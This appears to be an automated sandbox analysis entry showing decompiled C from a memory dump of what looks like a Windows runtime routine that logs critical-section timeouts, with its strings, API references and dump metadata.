                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      			E04ECFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E04E7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E04EC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E04EC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}











                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ECFDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ECFE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ECFE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%